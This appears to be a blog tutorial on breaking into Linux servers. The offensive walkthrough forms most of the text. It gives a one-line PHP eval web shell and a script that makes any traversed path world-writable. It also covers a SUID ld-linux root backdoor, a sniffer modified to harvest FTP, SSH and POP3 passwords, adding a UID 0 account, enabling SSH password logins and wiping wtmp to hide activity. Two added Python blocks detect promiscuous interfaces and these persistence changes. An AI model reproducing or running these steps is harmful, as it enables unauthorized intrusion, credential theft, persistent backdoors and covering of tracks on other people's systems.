How to Deploy a One‑Line PHP Backdoor and Escalate Linux Privileges

This guide demonstrates how to create a one‑line PHP backdoor, gain an interactive shell, perform Linux privilege escalation via kernel exploits, compile and use tools like arpsniffer and linsniffer, and employ various post‑exploitation techniques such as modifying system files and establishing persistent root access.

MaGe Linux Operations

Creating a PHP Backdoor

Write a one‑line PHP backdoor and upload it to the target:

<?php @eval($_POST[md5])?>

Verify that the file is in place:

cat rankuplog_time.php

Obtaining an Interactive Shell

Use Python's pty module to spawn a fully interactive shell (most systems have Python installed):

python -c 'import pty; pty.spawn("/bin/sh")'

Check the current user:

id

Typical output shows a non‑root UID, e.g., uid=529(zeicom) gid=525(zeicom). Determine the kernel version:

uname -r

Example output: 2.6.18-164.11.1.el5PAE.

Linux Privilege‑Escalation Vectors

Common paths include third‑party software vulnerabilities, local trust features, and kernel overflows. Exploit databases such as http://tools.90sec.org/, http://sebug.net/paper/linux_exp/, http://x73.cc/bitch/exp/, and http://www.exploit-db.com/search/ provide relevant payloads.

Compiling and Using arpsniffer

Install required libraries:

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install

Compile the sniffer:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run it against the target network (example IPs):

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Capturing Traffic with tcpdump

Listen for traffic from the mail server:

tcpdump -i eth0 host 192.168.0.11

Save captured packets to a file for later analysis:

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Modifying linsniffer.c to Capture Credentials

Adjust the destination‑port checks to target services of interest (e.g., FTP, SSH, Telnet, HTTP, POP3, Rlogin, POPPASS):

if(ntohs(tcp->dest)==21)  p=1; /* ftp */
if(ntohs(tcp->dest)==22)  p=1; /* ssh */
if(ntohs(tcp->dest)==23)  p=1; /* telnet */
if(ntohs(tcp->dest)==80)  p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

Compile and run:

gcc -o linsniffer linsniffer.c
./linsniffer

Captured usernames and passwords are stored in tcp.log.
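Sniffers such as arpsniffer and linsniffer open the interface in promiscuous mode, which the kernel exposes as the IFF_PROMISC bit in /sys/class/net/<iface>/flags. This added example (not from the original post) lists interfaces with that bit set; the sample flag values are constructed.

```python
import os
from typing import Dict, List

IFF_PROMISC = 0x100  # from <linux/if.h>

def is_promisc(flags_text: str) -> bool:
    """The flags file holds a hex value such as '0x1003' (UP|BROADCAST|MULTICAST)."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)

def promisc_interfaces(sysfs_net: str = "/sys/class/net") -> List[str]:
    """Return the names of interfaces whose flags include IFF_PROMISC."""
    found = []
    if not os.path.isdir(sysfs_net):
        return found
    for iface in sorted(os.listdir(sysfs_net)):
        flags_path = os.path.join(sysfs_net, iface, "flags")
        try:
            with open(flags_path, encoding="ascii") as fh:
                if is_promisc(fh.read()):
                    found.append(iface)
        except (OSError, ValueError):
            continue  # not a network device, or unreadable
    return found

# Constructed sample flag values: eth0 normal, eth1 with the promiscuous bit set.
SAMPLE_FLAGS: Dict[str, str] = {"eth0": "0x1003\n", "eth1": "0x1103\n"}

if __name__ == "__main__":
    print({name: is_promisc(v) for name, v in SAMPLE_FLAGS.items()})
    print(promisc_interfaces())  # meaningful on a live Linux host only
```

Pair this with a check for an unexpected tcp.log in writable directories, since that is where the modified linsniffer writes what it captures.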

Cross‑Directory PHP Exploit

When privilege escalation fails, a simple PHP script can attempt to change permissions on an arbitrary path:

<?php
// Takes a path from the query string and tries to make it world-writable.
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if($ok) echo "CHMOD OK, permission editable file or directory.";
?>

Save as tmdsb.php and invoke, for example:

http://www.tmdsb.com/tmdsb.php?path=../../target_dir/index.php

Udev‑Based Privilege Escalation (Kernel ≤ 2.6.*)

Upload the exploit source files, make them executable, and run the overflow binary to obtain a root shell.

Create a SUID copy of ld-linux.so.2:

cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1ven

Execute the backdoor to regain root:

/tmp/.str1ven `which whoami`

Post‑Exploitation Enumeration

Common commands to gather system information:

cat /etc/passwd
cat /etc/shadow
ifconfig
netstat -an | grep LISTEN
service --status-all | grep running
lsb_release -a

Modify SSH configuration to allow password authentication:

sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /etc/ssh/sshd_config
service sshd restart

Alter /etc/passwd to give a user UID 0, or directly add a root‑equivalent account:

sed -i 's/bin:x:1:1/bin:x:0:1/' /etc/passwd
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

Clear login records to hide activity:

cp /dev/null /var/log/wtmp
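An added host audit (not part of the original post) for the three persistence changes shown above: extra UID 0 entries in /etc/passwd, PasswordAuthentication switched on in sshd_config, and a zeroed /var/log/wtmp. The sample file contents are constructed; the live‑host paths are the standard ones.

```python
import os
import re
from pathlib import Path
from typing import Dict, List

def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Return every account with UID 0 other than the canonical root entry."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[2].isdigit():
            continue  # comment or malformed line
        if int(fields[2]) == 0 and fields[0] != "root":
            found.append(fields[0])
    return found

_PASSAUTH_RE = re.compile(r"^\s*PasswordAuthentication\s+(\S+)", re.IGNORECASE)

def password_auth_enabled(sshd_config_text: str) -> bool:
    """sshd honours the first PasswordAuthentication directive; the default is yes."""
    for line in sshd_config_text.splitlines():
        m = _PASSAUTH_RE.match(line)
        if m:
            return m.group(1).lower() == "yes"
    return True

def wtmp_emptied(path: str = "/var/log/wtmp") -> bool:
    """A zero-byte wtmp on a running system is a classic sign of a log wipe."""
    return os.path.exists(path) and os.path.getsize(path) == 0

def audit_host() -> Dict[str, object]:
    """Run the three checks read-only against the live host's standard files."""
    passwd = Path("/etc/passwd").read_text(errors="replace")
    sshd = Path("/etc/ssh/sshd_config").read_text(errors="replace")
    return {"extra_uid0": extra_uid0_accounts(passwd),
            "password_auth": password_auth_enabled(sshd),
            "wtmp_emptied": wtmp_emptied()}

# Constructed samples mirroring the edits above (bin moved to UID 0, nosec added).
PASSWD_SAMPLE = ("root:x:0:0:root:/root:/bin/bash\nbin:x:0:1:bin:/bin:/sbin/nologin\n"
                 "zeicom:x:529:525::/home/zeicom:/bin/bash\nnosec:x:0:0::/:/bin/sh\n")
SSHD_SAMPLE = "# hardened\nPasswordAuthentication no\n"

if __name__ == "__main__":
    print(extra_uid0_accounts(PASSWD_SAMPLE))  # ['bin', 'nosec']
    print(password_auth_enabled(SSHD_SAMPLE))  # False
```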

Additional Tools

Compile a static protocol tester:

gcc prtcl2.c -o local -static -Wall

Create a large dummy file for certain kernel exploits:

dd if=/dev/zero of=bigfile bs=10M count=10

All the above steps illustrate a typical workflow for gaining and maintaining root access on vulnerable Linux systems.

Tags: network sniffing, kernel exploit, Linux privilege escalation, php backdoor, post-exploitation
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
